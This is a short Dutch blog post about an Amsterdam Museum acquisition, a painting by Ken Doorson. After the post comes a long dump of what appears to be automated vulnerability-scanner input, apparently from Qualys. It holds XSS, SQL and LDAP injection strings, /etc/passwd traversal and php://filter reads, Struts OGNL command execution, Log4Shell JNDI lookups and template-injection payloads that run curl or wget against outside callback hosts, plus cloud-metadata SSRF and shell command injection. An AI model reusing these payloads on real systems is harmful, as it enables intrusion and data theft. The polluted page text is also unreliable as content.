11 okt 2017 Ken Doorson Amsterdam Museum door robbert rommy | geplaatst in: Geen categorie | 169 De allernieuwste aanwinst van het Amsterdam Museum is een schilderij van Ken Doorson (Moengo, 1978): Manumission Pauline. ( Klik op de tekst voor lezing door Ellen Neslo ) Deze post is ook beschikbaar in: Engels SpaansTweetPinShare1ShareTelegramWhatsApp1 Shares
1
1
Veiligheidsscan ForusP
1
1
“‘>
1
” onEvent=X139823199612288Y2_2Z
1
1″‘>
1
“‘>
1
“‘>
" onEvent=X139823199612288Y3_2Z
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
{{333*334}}
1
q
Qualys_resp_hdr_injection: Vulnerable
qualyswasesi
1
1
;–
1
/*
1
,
1
1e309
1
//….//….//….//….//….//….//….//etc/passwd
//....//....//....//....//....//....//....//etc/passwd
1
1
….//….//….//….//….//….//etc/passwd
1
%25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
a(){}phpinfo(); function a
http://rfitest/
1
1
“);(function(){qxssI6k0AOh7});/**/”
1
‘;(function(){qxss3pJB6irM});/**/’
1
9
;(function(){qxssBMv4NiL6});//
1
‘-qxssfAAMnTQ4()-‘
1
“-qxssS1YcI7Fl()-“
1
1!@#$%^&*()
1
!@#$%^&*()
1
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
1
(23.0231*213.759)
http://169.254.169.254/latest/meta-data/
1
1
http://169.254.169.254/latest/meta-data/
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
1
1)(attribute2=*)
1)(attribute2=*)
1
1
1*(|(objectclass=*))
1
1*
1
1)(|(uid=*)
1
1)(|(gidNumber=*)
1
Joe+
bcc:was_engine@4365a61de0cab6a8458f49a3b46d2be64f0923c2.2168011610231792.1047765570.smtphi01.smtp.eu1.qualysperiscope.com.
1
http://fa1c5cdf0269d66dbde03ff6e70f0d117e94fa88.2168011610231792.1917114786.ssrf01.ssrf.eu1.qualysperiscope.com.
1
c1b5e90293c3bb22bfd94ba5e9c77c75f92512aa.2168011610231792.1314142982.ssrf02.ssrf.eu1.qualysperiscope.com.
1
${jndi:rmi://ee08445af41ecf961af9844877c61a053b30a6d6.2168011610231792.216621298.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://d3196c2e5ba0eaffdabf71841e0df1df3f5bdb7d.2168011610231792.2310138708.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://a77a921a193d9e958c96bcbd10e6511383dcb280.2168011610231792.1100770962.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${jndi:dns://d066e10998fa1b820b3bad84be333ea945f05e1c.2168011610231792.250503936.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://da0e7b41477c629ea59a0bbd62f7cb410df2278c.2168011610231792.3377359016.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}
1
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://f90daafcb768d1b3744ce639cebee8d53c40167e.2168011610231792.1409414041.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}
1
@pd.core.frame.com.builtins.__import__(“os”).system(“””curl 23ef0b7a3d7b52af8d9d09d3ac851d9bf22aa09e.2168011610231792.3485763648.oscomm15256400.oscomm.eu1.qualysperiscope.com.#”””)
1
$..[?(p=”console.log(this.process.mainModule.require(‘child_process’).execSync(‘curl 75de3f6bb35aef4ed13975fbddbc872d85a1996e.2168011610231792.417843277.oscomm15279701.oscomm.eu1.qualysperiscope.com.’).toString())”;QualysWAS=”[[‘constructor’]][[‘constructor’]](p);QualysWAS())]
1
http://localhost:19096
file:///etc/passwd
1
1
file:///etc/passwd
1') or 2634=2634 --
1
1
1′) or 2634=2634 —
1
1′ or 3789=3789 —
1
1 or 4325=4325 —
1
“‘>
1
_q=random(X140285921260992Y2_2Z)
1
‘ onEvent=X140285921260992Y2_2Z
1
” onEvent=X140285921260992Y2_2Z
1
javascript:qxss(X140285921260992Y2_2Z);
1
“>
1
1″‘>
1
z–>
1
“‘>
1
_q=random(X140285921260992Y2_2Z)
1
_q=random(X140285921260992Y2_2Z)
1
1 _q_q=random(08o75ybQ)
1
1
” SRC=//localhost/j854gd5w4>
1
1
“‘><qssUIFogWDb=7;//<
1
1
1
1″>
1
BODY{background:url(“javascript:qssefKN8lKq=7”)}
1
1
“‘>
' onEvent=X140285921260992Y3_2Z
1
" onEvent=X140285921260992Y3_2Z
1
1
qssnyOHM6cz=7
script z_q(y)/script
1
1
<script src=http://localhost/j
1
qss{{q=(2*2.0)}}qss
{{333*334}}
1
1
q
Content-Type:text/html
Content-Length: 190
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2
AA
q Qualys_resp_hdr_injection: Vulnerable
1
1
q
Qualys_resp_hdr_injection: Vulnerable
1
qualyswasesi
1
1′
;--
1
1
#
/*
1
1
“
,
1
1
(
1e309
1
1
php://filter/read=string.rot13/resource=/etc/passwd
....//....//....//....//....//....//etc/passwd
1
1
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
a(){}phpinfo(); function a
1
1
|netstat -an
1
http://rfitest/
javascript:qxss(X140285921260992Y3_2Z);
1
1
“;(function(){qxss35wUWWS1});/**/”
1
“);(function(){qxssdWxvpQmQ});/**/”
1
qualys(aqxssAT7dfR2n)xyz
1
‘;(function(){qxss0m5pZ5vE});/**/’
1
9;(function(){qxssjBDVzqd4});//
1
9
;(function(){qxssQwH150nH});//
1
*/;(function(){qxss0U5W3Yul});/*
1
‘-qxss4aT13F4y()-‘
1
“-qxssqpAAf131()-“
1
1!@#$%^&*()
1
!@#$%^&*()1
1
!@#$%^&*()
1
|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
1
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/}
/*
#set($value=23.0231*213.759)
$value
*/
(23.0231*213.759)
1
1
<!–#config timefmt="” –>qualyswas:
1
function(){qxss3DNp2K9p};
1
https://community.qualys.com/
1
${”.getClass().forName(‘java.lang.Runtime’).getMethods()[6].toString()}
1
QualysWAS${150797*150797}QualysWAS
1
1)(uid=*))(|(uid=*
1*(|(objectclass=*))
1
1
1)(|(cn=*))
1*
1
1
1)(|(objectclass=*)
1)(|(uid=*)
1
1
1)(|(homeDirectory=*)
1)(|(gidNumber=*)
1
1
1)(|(uidNumber=*)
1
Joe+
bcc:was_engine@30224968195dc50dee67605ec2c70649f3653411.2183101010231792.2906004734.smtphi01.smtp.eu1.qualysperiscope.com.
1
http://397ee68201d3e41666552c0efc0eaeb29e5b4461.2183101010231792.741478801.ssrf01.ssrf.eu1.qualysperiscope.com.
1
12aa66c9db81199807f25cf97c28351649c11012.2183101010231792.649056049.ssrf02.ssrf.eu1.qualysperiscope.com.
1
${jndi:ldap://fcce299db1a21772bf5675de12484a01d946d4cc.2183101010231792.3441164599.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://99b274a2abd2f8a83d75c9314de89eee256dd177.2183101010231792.4252479270.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://d2d68705fa42995abf096e83240d478de0d389a1.2183101010231792.1791685453.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://a61c45324429088b255779e2e82a0b0c197bed01.2183101010231792.961902348.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//114d42bf20ab7733507d5a8be4c5054d8a8d0955.2183101010231792.3990021575.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://61e761152ac1f8f26fddda33132ffddb244e59b7.2183101010231792.2253493329.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//6f785ea54436de649b7a843cdcaf9cf8e8148c3a.2183101010231792.1098729147.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${jndi:dns://41a2c6ebcfd7cce00c1e0fc899b932e134184029.2183101010231792.750573740.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//6d21020300cdf70474a440d966d533061d6f280e.2183101010231792.3749227859.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://58245bf4c8691d0ac59ebf33e95ab25bf5d22926.2183101010231792.3239394689.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://0ff6fd902904f12c65ac723a5e094ac4b79fa712.2183101010231792.3500733073.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
1
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://c5e7aff9c9f6fc736b2ac2561de8b4cc48a79731.2183101010231792.3927387682.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}
1
${“”.getClass().forName(“java.net.InetAddress”).getMethod(“getByName”,””.getClass()).invoke(“”,”6f75978ecfd6bfd78e1cba5fce3f887f3a3b57fd.2183101010231792.1503413798.oscomm15079701.oscomm.eu1.qualysperiscope.com.”)}
1
@pd.core.frame.com.builtins.__import__(“os”).system(“””curl 1c670bbcb9b9a1a8f3dac2369b4af777d2230d30.2183101010231792.3433830106.oscomm15256400.oscomm.eu1.qualysperiscope.com.#”””)
1
@pd.core.frame.com.builtins.__import__(“os”).system(“””curl 206672234de71db328cd8776b5ff5b64cd2b99a2.2183101010231792.11969705.oscomm15256401.oscomm.eu1.qualysperiscope.com.#”””)
1
$..[?(p=”console.log(this.process.mainModule.require(‘child_process’).execSync(‘curl 00aaba32cec4dc985d4004d05856ac3ed4016cc4.2183101010231792.3318852717.oscomm15279701.oscomm.eu1.qualysperiscope.com.’).toString())”;QualysWAS=”[[‘constructor’]][[‘constructor’]](p);QualysWAS())]
http://localhost:19096
1
1
1′) and 2634=1123 —
1
1′ and 3789=1391 —
1
1 and 4325=2728 —
1
1 or 6248 IS NULL
1
1 and 7248 IS NULL
1
1′) and ‘swqtp’=’ptqws
1
1′ and ’tpklq’=’xqlkp
1
11 or 11=12
1
1′ and false() and ‘or’ = ‘and
1
1 and false() and ‘or’ = ‘and’
1
1″ and false() and “or” = “and
1
aaaa&ping -n 92 localhost&